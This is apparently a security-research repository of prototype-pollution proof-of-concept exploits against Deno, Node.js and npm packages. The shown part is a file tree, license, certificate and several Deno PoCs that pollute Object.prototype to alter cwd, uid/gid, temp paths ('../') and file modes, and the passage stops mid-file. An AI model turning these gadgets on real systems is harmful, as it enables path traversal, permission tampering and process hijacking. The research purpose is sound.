├── .gitignore
├── LICENSE
├── README.md
├── cert.pem
├── deno
├── Deno
│ ├── Command
│ │ ├── Command.cwd.PoC.ts
│ │ ├── Command.gid.PoC.ts
│ │ └── Command.uid.PoC.ts
│ ├── makeTempDir
│ │ ├── makeTempDir.dir.PoC.ts
│ │ ├── makeTempDir.prefix.PoC.ts
│ │ ├── makeTempDirSync.dir.PoC.ts
│ │ └── makeTempDirSync.prefix.PoC.ts
│ ├── makeTempFile
│ │ ├── makeTempFile.dir.PoC.ts
│ │ ├── makeTempFile.prefix.PoC.ts
│ │ ├── makeTempFileSync.dir.PoC.ts
│ │ └── makeTempFileSync.prefix.PoC.ts
│ ├── mkdir
│ │ ├── mkdir.mode.PoC.ts
│ │ └── mkdirSync.mode.PoC.ts
│ ├── open
│ │ ├── open.append.PoC.ts
│ │ ├── open.mode.PoC.ts
│ │ ├── open.truncate.PoC.ts
│ │ ├── openSync.append.PoC.ts
│ │ ├── openSync.mode.PoC.ts
│ │ └── openSync.truncate.PoC.ts
│ ├── run
│ │ ├── run.cwd.PoC.ts
│ │ ├── run.gid.PoC.ts
│ │ └── run.uid.PoC.ts
│ ├── writeFile
│ │ ├── writeFile.append.PoC.ts
│ │ ├── writeFile.mode.PoC.ts
│ │ ├── writeFileSync.append.PoC.ts
│ │ └── writeFileSync.mode.PoC.ts
│ └── writeTextFile
│ │ ├── writeTextFile.append.PoC.ts
│ │ ├── writeTextFile.mode.PoC.ts
│ │ ├── writeTextFileSync.append.PoC.ts
│ │ └── writeTextFileSync.mode.PoC.ts
├── Worker
│ ├── .gitignore
│ ├── Worker.env.PoC.ts
│ ├── Worker.ffi.PoC.ts
│ ├── Worker.hrtime.PoC.ts
│ ├── Worker.net.PoC.ts
│ ├── Worker.read.PoC.ts
│ ├── Worker.run.PoC.ts
│ ├── Worker.sys.PoC.ts
│ └── Worker.write.PoC.ts
├── fetch
│ └── fetch.PoC.ts
├── node
│ ├── child_process
│ │ ├── exec.env.PoC.ts
│ │ ├── execFileSync.env.PoC.ts
│ │ ├── execSync.env.PoC.ts
│ │ ├── spawn.env.PoC.ts
│ │ ├── spawn.gid.PoC.ts
│ │ ├── spawn.uid.PoC.ts
│ │ └── spawnSync.env.PoC.ts
│ ├── fs
│ │ ├── appendFile.length.PoC.ts
│ │ ├── appendFile.offset.PoC.ts
│ │ ├── writeFile.length.PoC.ts
│ │ └── writeFile.offset.PoC.ts
│ ├── http
│ │ └── request.hostname.PoC.ts
│ ├── https
│ │ └── request.hostname.PoC.ts
│ └── zlib
│ │ └── createBrotliCompress.params.PoC.ts
└── std
│ ├── dotenv
│ ├── .env
│ ├── .env.default
│ ├── .env.other
│ ├── load.any.PoC.ts
│ ├── load.defaultsPath.PoC.ts
│ ├── load.envPath.PoC.ts
│ ├── load.export.PoC.ts
│ ├── loadSync.any.PoC.ts
│ ├── loadSync.defaultsPath.PoC.ts
│ ├── loadSync.envPath.PoC.ts
│ └── loadSync.export.PoC.ts
│ ├── json
│ ├── JsonStringifyStream.prefix.PoC.ts
│ └── JsonStringifyStream.suffix.PoC.ts
│ ├── log
│ └── FileHandler.formatter.PoC.ts
│ ├── tar
│ ├── Tar.gid.PoC.ts
│ └── Tar.uid.PoC.ts
│ └── yaml
│ └── stringify.indent.PoC.ts
├── http-server.js
├── https-server.js
├── key.pem
├── nodejs
├── child_process
│ ├── exec.env.PoC.js
│ ├── execFile.env.PoC.js
│ ├── execFileSync.env.PoC.js
│ ├── execFileSync.input.win.PoC.js
│ ├── execSync.env.PoC.js
│ ├── execSync.env.lnx.PoC.js
│ ├── execSync.input.win.PoC.js
│ ├── fork.env.PoC.js
│ ├── package-lock.json
│ ├── package.json
│ ├── shell.js
│ ├── spawn.env.PoC.js
│ ├── spawn.input.win.js
│ ├── spawnSync.env.PoC.js
│ ├── spawnSync.env.lnx.PoC.js
│ ├── spawnSync.input.win.PoC.js
│ └── test.js
├── http
│ ├── fetch.options.PoC.js
│ ├── fetch.socketPath.PoC.js
│ ├── get.options.PoC.js
│ ├── listen.host.PoC.js
│ └── requiest.options.PoC.js
├── https
│ ├── get.options.PoC.js
│ ├── requiest.options.PoC.js
│ └── tls.connect.PoC.js
├── import
│ ├── import.source.PoC.js
│ └── test.mjs
├── require
│ ├── package-lock.json
│ ├── package.json
│ ├── require.main.PoC.js
│ ├── require.main2.PoC.js
│ └── test_sub_folder
│ │ └── index.js
└── working_threads
│ ├── ctor.PoC.js
│ └── test.js
└── npm-packages
├── 0-day.zip
├── asyncawait
├── asyncawait.PoC.js
├── package-lock.json
└── package.json
├── better-queue
├── better-queue.PoC.js
├── package-lock.json
└── package.json
├── binary-parser
├── binary-parser.PoC.js
├── package-lock.json
└── package.json
├── bson
├── bson.PoC.js
├── package-lock.json
└── package.json
├── chrome-launcher
├── chrome-launcher.PoC.js
├── package-lock.json
└── package.json
├── coffee
├── coffee.fork.PoC.js
├── coffee.spawn.PoC.js
├── package-lock.json
└── package.json
├── colors.js
├── consolidate
├── jazz.PoC.js
├── package-lock.json
├── package.json
├── underscore.PoC.js
└── views
│ └── underscore.template.html
├── crawler
├── crawler.PoC.js
├── package-lock.json
└── package.json
├── cross-port-killer
├── cross-port-killer.PoC.js
├── package-lock.json
└── package.json
├── cross-spawn
├── cross-spawn.spawn.PoC.js
├── cross-spawn.spawn.sync.PoC.js
├── package-lock.json
└── package.json
├── csv-write-stream
├── csv-write-stream.PoC.js
├── out.csv
├── package-lock.json
└── package.json
├── divx.js
├── doT
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
└── views
│ ├── mytemplate.jst
│ ├── test.def
│ └── test.dot
├── dockerfile_lint
├── dockerfile_lint.PoC.js
├── dockerfile_rules.yml
├── package-lock.json
└── package.json
├── dot
├── dot.PoC.js
├── package-lock.json
├── package.json
└── views
│ └── mytemplate.jst
├── download-git-repo
├── download-git-repo.PoC.js
├── package-lock.json
└── package.json
├── dtrace-provider
├── dtrace-provider.PoC.js
├── package-lock.json
└── package.json
├── dustjs
├── app-0.js
├── package-lock.json
├── package.json
└── views
│ ├── hello.dust
│ ├── includes
│ └── mood.dust
│ └── index.dust
├── ect
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
└── views
│ ├── extra.ect
│ ├── footer.html
│ ├── header.html
│ ├── index.ect
│ ├── layout.ect
│ ├── layout.html
│ ├── page.html
│ └── sublayout.html
├── ejs
├── ejs.PoC.js
├── package-lock.json
└── package.json
├── ejs@2.7.4
├── app-0.js
├── app-1.js
├── app-2.js
├── app-3.js
├── package-lock.json
├── package.json
└── views
│ ├── footer.ejs
│ ├── header.ejs
│ ├── login_register.ejs
│ └── main.ejs
├── esformatter
├── esformatter.PoC.js
├── package-lock.json
└── package.json
├── exec
├── exec.PoC.js
├── package-lock.json
└── package.json
├── external-editor
├── external-editor.edit.PoC.js
├── external-editor.editAsync.js
├── package-lock.json
└── package.json
├── fibers
├── fibers.PoC.js
├── package-lock.json
└── package.json
├── find-process
├── find-process.PoC.js
├── package-lock.json
└── package.json
├── fluent-ffmpeg
├── fluent-ffmpeg.PoC.js
├── package-lock.json
└── package.json
├── forever-monitor
├── forever-monitor.PoC.js
├── package-lock.json
└── package.json
├── gh-pages
├── dist
│ └── test.txt
├── gh-pages.PoC.js
├── package-lock.json
└── package.json
├── gift
├── gift.clone.PoC.js
├── package-lock.json
└── package.json
├── git-clone
├── git-clone.PoC.js
├── package-lock.json
└── package.json
├── gm
├── gm.PoC.js
├── package-lock.json
└── package.json
├── growl
├── growl.PoC.js
├── package-lock.json
└── package.json
├── hamlet
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
└── views
│ ├── layout.hamlet
│ └── wrapped.hamlet
├── hamljs
├── app-0.js
├── package-lock.json
├── package.json
└── views
│ └── page.haml
├── handlebars
├── handlebars.Poc.js
├── package-lock.json
└── package.json
├── hbsfy
├── hbsfy.configure.PoC.js
├── package-lock.json
└── package.json
├── jade
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
└── views
│ ├── attrs.jade
│ ├── comments.jade
│ ├── each-else.jade
│ ├── index.jade
│ ├── mixin.jade
│ └── when-case.jade
├── jsdoc-api
├── jsdoc-api.explain.PoC.js
├── jsdoc-api.explainSync.PoC.js
├── jsdoc-api.renderSync.PoC.js
├── package-lock.json
└── package.json
├── jsdoc-to-markdown
├── jsdoc-test.js
├── jsdoc-to-markdown.render.PoC.js
├── jsdoc-to-markdown.renderSync.PoC.js
├── package-lock.json
└── package.json
├── koa-views
├── koa-views.PoC.js
├── package-lock.json
├── package.json
└── views
│ └── underscore.template.html
├── liftoff
├── liftoff.PoC.js
├── package-lock.json
└── package.json
├── lodash.template
├── lodash.template.PoC.js
├── package-lock.json
└── package.json
├── mote
├── app-0.js
├── package-lock.json
├── package.json
└── views
│ └── template.html
├── mrm-core
├── mrm-core.PoC.js
├── package-lock.json
└── package.json
├── node-blade
├── app-1.js
├── app-2.js
├── app-3.js
├── app-4.js
├── app-5.js
├── app-6.js
├── package-lock.json
├── package.json
└── views
│ ├── attributes2.blade
│ ├── attributes_ids_classes.blade
│ ├── attributes_interpolation.blade
│ ├── attributes_multi_line.blade
│ ├── blank_lines.blade
│ ├── block-comment.blade
│ ├── blocks.blade
│ ├── blocks2.blade
│ ├── blocks3.blade
│ ├── code.blade
│ ├── code_multiline.blade
│ ├── comments.blade
│ ├── doctype.blade
│ ├── event_handlers.blade
│ ├── exposing_child.blade
│ ├── exposing_parent.blade
│ ├── factorial.blade
│ ├── filters.blade
│ ├── foreach.blade
│ ├── functions.blade
│ ├── functions2.blade
│ ├── functions_and_block.blade
│ ├── functions_and_block_include.blade
│ ├── include.blade
│ ├── include2.blade
│ ├── include_in_func.blade
│ ├── include_in_replace_block.blade
│ ├── include_in_replace_block
│ ├── block_content.blade
│ ├── block_def.blade
│ ├── replace_block.blade
│ └── replace_block_include.blade
│ ├── included.blade
│ ├── interpolate.blade
│ ├── interpolate2.blade
│ ├── layer1.blade
│ ├── layer2.blade
│ ├── layer3.blade
│ ├── layer3_render.blade
│ ├── liveui.blade
│ ├── many_doctypes.blade
│ ├── tag_whitespace.blade
│ ├── tags.blade
│ └── text_blocks.blade
├── nodemailer
├── nodemailer.PoC.js
├── package-lock.json
└── package.json
├── payload.js
├── ping
├── package-lock.json
├── package.json
└── ping.PoC.js
├── play-sound
├── package-lock.json
├── package.json
├── play-sound.ctor.PoC.js
└── play-sound.play.PoC.js
├── primus
├── package-lock.json
├── package.json
├── primus.parser.PoC.js
└── primus.transformer.PoC.js
├── pug
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
├── pug.Poc.js
└── views
│ └── attrs.pug
├── python-shell
├── package-lock.json
├── package.json
└── python-shell.PoC.js
├── ractive
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
└── views
│ └── template.ract
├── require-from-string
├── package-lock.json
├── package.json
└── require-from-string.PoC.js
├── requireg
├── package-lock.json
├── package.json
└── requireg.PoC.js
├── saker
├── app-0.js
├── package-lock.json
├── package.json
└── views
│ ├── template.html
│ └── template1.html
├── sonarqube-scanner
├── package-lock.json
├── package.json
└── sonarqube-scanner.PoC.js
├── squirrelly
├── app-0.js
├── app-1.js
├── package-lock.json
├── package.json
└── views
│ ├── each.sqrl
│ └── index.squirrelly
├── tangular
├── app-0.js
├── package-lock.json
├── package.json
└── views
│ ├── template.html
│ └── template1.html
├── teen_process
├── package-lock.json
├── package.json
└── teen_process.PoC.js
├── the-script-jsdoc
├── my_project_dir
│ ├── jsdoc.json
│ └── test.txt
├── package-lock.json
├── package.json
└── the-script-jsdoc.PoC.js
├── tingodb
├── localdb
│ └── test_collection
├── package-lock.json
├── package.json
└── tingodb.PoC.js
├── window-size
├── package-lock.json
├── package.json
└── window-size.PoC.js
├── winreg
├── package-lock.json
├── package.json
└── winreg.PoC.js
└── workerpool
├── package-lock.json
├── package.json
└── workerpool.PoC.js
/.gitignore:
--------------------------------------------------------------------------------
1 | # Dependency directories
2 | node_modules/
3 |
4 | # Optional npm cache directory
5 | .npm
6 |
7 | # yarn v2
8 | .yarn/cache
9 | .yarn/unplugged
10 | .yarn/build-state.yml
11 | .yarn/install-state.gz
12 | .pnp.*
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2024 Mikhail Shcherbakov
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/cert.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN CERTIFICATE-----
2 | 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
31 | -----END CERTIFICATE-----
32 |
--------------------------------------------------------------------------------
/deno/Deno/Command/Command.cwd.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("cwd", "/");
6 | const process = new Deno.Command("ls");
7 | process.spawn();
8 |
--------------------------------------------------------------------------------
/deno/Deno/Command/Command.gid.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("gid", 42);
6 | const process = new Deno.Command("id");
7 | process.spawn()
8 |
--------------------------------------------------------------------------------
/deno/Deno/Command/Command.uid.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("uid", 42);
6 | const process = new Deno.Command("id");
7 | process.spawn()
8 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempDir/makeTempDir.dir.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("dir", ".");
6 |
7 | const path = await Deno.makeTempDir();
8 | console.log(path);
9 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempDir/makeTempDir.prefix.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("prefix", "../");
6 |
7 | // NOTE: providing dir only for illustrative purposes
8 | const path = await Deno.makeTempDir({ dir: "." });
9 | console.log(path);
10 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempDir/makeTempDirSync.dir.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("dir", ".");
6 |
7 | const path = Deno.makeTempDirSync();
8 | console.log(path);
9 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempDir/makeTempDirSync.prefix.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("prefix", "../");
6 |
7 | // NOTE: providing dir only for illustrative purposes
8 | const path = Deno.makeTempDirSync({ dir: "." });
9 | console.log(path);
10 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempFile/makeTempFile.dir.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("dir", ".");
6 |
7 | const path = await Deno.makeTempFile();
8 | console.log(path);
9 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempFile/makeTempFile.prefix.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("prefix", "../");
6 |
7 | // NOTE: providing dir only for illustrative purposes
8 | const path = await Deno.makeTempFile({ dir: "." });
9 | console.log(path);
10 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempFile/makeTempFileSync.dir.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("dir", ".");
6 |
7 | const path = Deno.makeTempFileSync();
8 | console.log(path);
9 |
--------------------------------------------------------------------------------
/deno/Deno/makeTempFile/makeTempFileSync.prefix.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("prefix", "../");
6 |
7 | // NOTE: providing dir only for illustrative purposes
8 | const path = Deno.makeTempFileSync({ dir: "." });
9 | console.log(path);
10 |
--------------------------------------------------------------------------------
/deno/Deno/mkdir/mkdir.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | async function createAndLog(name: string) {
6 | // NOTE: the second argument (options) must not be undefined
7 | await Deno.mkdir(`./${name}`, {});
8 |
9 | const fileInfo = await Deno.stat(`./${name}`);
10 | console.log("mode:", fileInfo.mode);
11 |
12 | Deno.remove(`./${name}`);
13 | }
14 |
15 | await createAndLog("unpolluted");
16 | pollute("mode", 0o000);
17 | await createAndLog("polluted");
18 |
--------------------------------------------------------------------------------
/deno/Deno/mkdir/mkdirSync.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | async function createAndLog(name: string) {
6 | // NOTE: the second argument (options) must not be undefined
7 | Deno.mkdirSync(`./${name}`, {});
8 |
9 | const fileInfo = await Deno.stat(`./${name}`);
10 | console.log("mode:", fileInfo.mode);
11 |
12 | Deno.remove(`./${name}`);
13 | }
14 |
15 | await createAndLog("unpolluted");
16 | pollute("mode", 0o000);
17 | await createAndLog("polluted");
18 |
--------------------------------------------------------------------------------
/deno/Deno/open/open.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | const wfile = await Deno.open(`./${name}`, { write: true });
15 | await wfile.write(data);
16 | wfile.close();
17 |
18 | const rfile = await Deno.open(`./${name}`, { read: true, append: false });
19 | const buffer = new Uint8Array(16);
20 | const count = await rfile.read(buffer);
21 | const text = new TextDecoder().decode(buffer);
22 | console.log(name, "contains", text, `(${count} bytes)`);
23 | rfile.close();
24 |
25 | Deno.remove(`./${name}`);
26 | }
27 |
28 | await create("unpolluted");
29 | await create("polluted");
30 |
31 | await writeThenRead("unpolluted");
32 | pollute("append", true);
33 | await writeThenRead("polluted");
34 |
--------------------------------------------------------------------------------
/deno/Deno/open/open.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function writeThenRead(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 |
12 | const fileInfo = await Deno.stat(`./${name}`);
13 | console.log(name, "mode:", fileInfo.mode);
14 |
15 | Deno.remove(`./${name}`);
16 | }
17 |
18 | await writeThenRead("unpolluted");
19 | pollute("mode", 0o777);
20 | await writeThenRead("polluted");
21 |
--------------------------------------------------------------------------------
/deno/Deno/open/open.truncate.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const orgData = new TextEncoder().encode("Hello world!");
6 | const newData = new TextEncoder().encode("foobar");
7 |
8 | async function create(name) {
9 | const file = Deno.openSync(`./${name}`, { create: true, write: true });
10 | await file.write(orgData);
11 | file.close();
12 | }
13 |
14 | async function writeThenRead(name) {
15 | const wfile = Deno.openSync(`./${name}`, { write: true });
16 | await wfile.write(newData);
17 | wfile.close();
18 |
19 | const rfile = Deno.openSync(`./${name}`, { read: true, truncate: false });
20 | const buffer = new Uint8Array(16);
21 | const count = await rfile.read(buffer);
22 | const text = new TextDecoder().decode(buffer);
23 | console.log(name, "contains", text, `(${count} bytes)`);
24 | rfile.close();
25 |
26 | Deno.remove(`./${name}`);
27 | }
28 |
29 | await create("unpolluted");
30 | await create("polluted");
31 |
32 | await writeThenRead("unpolluted");
33 | pollute("truncate", true);
34 | await writeThenRead("polluted");
35 |
--------------------------------------------------------------------------------
/deno/Deno/open/openSync.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 | const file = Deno.openSync(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | const wfile = Deno.openSync(`./${name}`, { write: true });
15 | await wfile.write(data);
16 | wfile.close();
17 |
18 | const rfile = Deno.openSync(`./${name}`, { read: true, append: false });
19 | const buffer = new Uint8Array(16);
20 | const count = await rfile.read(buffer);
21 | const text = new TextDecoder().decode(buffer);
22 | console.log(name, "contains", text, `(${count} bytes)`);
23 | rfile.close();
24 |
25 | Deno.remove(`./${name}`);
26 | }
27 |
28 | await create("unpolluted");
29 | await create("polluted");
30 |
31 | await writeThenRead("unpolluted");
32 | pollute("append", true);
33 | await writeThenRead("polluted");
34 |
--------------------------------------------------------------------------------
/deno/Deno/open/openSync.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function writeThenRead(name) {
8 | const file = Deno.openSync(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 |
12 | const fileInfo = await Deno.stat(`./${name}`);
13 | console.log(name, "mode:", fileInfo.mode);
14 |
15 | Deno.remove(`./${name}`);
16 | }
17 |
18 | await writeThenRead("unpolluted");
19 | pollute("mode", 0o777);
20 | await writeThenRead("polluted");
21 |
--------------------------------------------------------------------------------
/deno/Deno/open/openSync.truncate.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const orgData = new TextEncoder().encode("Hello world!");
6 | const newData = new TextEncoder().encode("foobar");
7 |
8 | async function create(name) {
9 | const file = await Deno.open(`./${name}`, { create: true, write: true });
10 | await file.write(orgData);
11 | file.close();
12 | }
13 |
14 | async function writeThenRead(name) {
15 | const wfile = await Deno.open(`./${name}`, { write: true });
16 | await wfile.write(newData);
17 | wfile.close();
18 |
19 | const rfile = await Deno.open(`./${name}`, { read: true, truncate: false });
20 | const buffer = new Uint8Array(16);
21 | const count = await rfile.read(buffer);
22 | const text = new TextDecoder().decode(buffer);
23 | console.log(name, "contains", text, `(${count} bytes)`);
24 | rfile.close();
25 |
26 | Deno.remove(`./${name}`);
27 | }
28 |
29 | await create("unpolluted");
30 | await create("polluted");
31 |
32 | await writeThenRead("unpolluted");
33 | pollute("truncate", true);
34 | await writeThenRead("polluted");
35 |
--------------------------------------------------------------------------------
/deno/Deno/run/run.cwd.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("cwd", "/");
6 | const process = Deno.run({ cmd: ["ls"] });
7 | console.log(process);
8 |
--------------------------------------------------------------------------------
/deno/Deno/run/run.gid.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("gid", 42);
6 | const process = Deno.run({ cmd: ["id"] });
7 | console.log(process);
8 |
--------------------------------------------------------------------------------
/deno/Deno/run/run.uid.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | pollute("uid", 42);
6 | const process = Deno.run({ cmd: ["id"] });
7 | console.log(process);
8 |
--------------------------------------------------------------------------------
/deno/Deno/writeFile/writeFile.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 | ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 | const file = await Deno.open(`./${name}`, { create: true, write: true });
9 | await file.write(data);
10 | file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 | await Deno.writeFile(`./${name}`, data);
15 |
16 | const file = await Deno.open(`./${name}`, { read: true, append: false });
17 | const buffer = new Uint8Array(16);
18 | const count = await file.read(buffer);
19 | const text = new TextDecoder().decode(buffer);
20 | console.log(name, "contains", text, `(${count} bytes)`);
21 | file.close();
22 |
